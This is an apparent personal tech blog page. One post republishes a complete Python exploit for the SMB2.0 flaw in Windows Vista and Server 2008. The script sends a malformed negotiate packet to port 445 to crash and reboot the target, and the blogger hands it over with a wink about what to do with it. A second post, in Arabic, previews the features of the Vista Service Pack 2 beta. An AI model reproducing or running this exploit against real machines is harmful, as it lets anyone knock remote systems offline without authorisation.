What I Know It’s About Experience

9Sep/09Off

Remote 0day Exploit for Vista, 2008 in the Wilde

There is a flaw in SMB2.0 which exists (I mean the SMBv2 itself not the vulnerability) in windows vista, 2008,7 and 2008 R2 but only Windows Vista & 2008 are vulnerable. If you exploited this flaw successfully you will crash & reboot any vista or 2008 remotely (of course only if SMB 445 port open :) ). Anyhow here is the exploit code it's written in python :) & I will assume that you know what to do with it :)

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Tagged as: , , , 2 Comments
25Oct/08Off

Windows Vista Service Pack 2 Beta

سلام عليكم تم الاعلان رسميا عن سرفس باك 2 لويندوز فيستا واللي اكدت مايكروسوفت انها راح تصدر قبل الانتهاء من ويندوز 7. السرفس باك 2 لويندوز فيستا ماراح يكون فيها تغييرات جذريه مثل السرفس باك1 صار فيها تحديث للكيرنل :) بكبرها. بتقولون طيب وش فيها السرفس باك 2 ؟ وش راح تحتوي عليه :)

انا اقولكم وش راح تحتوي عليه :)

1- جميع تحديثات التوافق اللي نزلت فرديه بعد السرفس باك 1 راح تكون في السرفس باك 2
2- اظافه Windows Search 4 للسرفس باك 2 لزياده سرعه البحث
3- اظافه Bluetooth 2.1 Feature Pack لدعم اخر متطلبات تقنية البلوتوث
4- اظافه دعم الكتابة على سيديات البلو راي بشكل افتراضي دون الحاجه لبرامج اخرى
5- اظافه Windows Connect Now لتسهيل عمليه اعدادات الاتصال بشبكات الوايرلس
6- اظافه دعم توقيت UTC لنظام الملفات exFAT لدعم عملية التزامن (synchronization) بين المناطق الزمنية (Time Zones).

النسخه التجريبية من السرفس باك 2 راح يتم اصدارها لفئه معينه من الناس يوم الاربعاء القادم والموافق 29 اكتوبر 2008 فا اكيد بعدها بيكون فيه نسخ مسربه للانترنت فا نصيحه للمستخدمين الغير محترفين لا تركب السرفس باك 2 وهي مازالت نسخه تجريبية لانه فيه احتمال كبير تسبب لك مشكله قد تصل الى اعاده تثبيت نظامك من جديد :)

صح قبل ما انسى ترى حتى ويندوز 2008 راح تنزل له سرفس باك 2 مثل الفيستا :) بتقولون اشلون!! مانزلت سرفس باك 1 اصلا عشان تصير 2 ؟ اقولكم الويندوز فيستا سرفس باك 1 مبنيه على ويندوز 2008 وعشان مساله التوافقيه فا راح تكون اسم السرفس الباك هو 2 بالويندوز 2008 :) يعني لا احد يستغرب :)

Tagged as: 1 Comment
   

Calendar

September 2010
S S M T W T F
« Aug    
 123
45678910
11121314151617
18192021222324
252627282930  

RSS Free Softwares

Tag Cloud

Announcement Antivirus Apple auditors benchmark Beta1 Browser Business Risk Information Security Debug documentation Editions Education Certification Knowledge Experience Federated Search Forensic Hacked Hardware HITB 2008 I'M A PC Internet Broken Live MacBook Micorosft Microsoft Microsoft ads Microsoft ICE nVidia Defective Oracle PDC 2008 Projects Recorder Security Security Awareness Security Talk Snow Leopard Sun SuperFetch UAC USB 3.0 video Wave3 Windows Windows7 Windows 2008 R2 Windows Vista WP-RTL

Posts Archives

Friends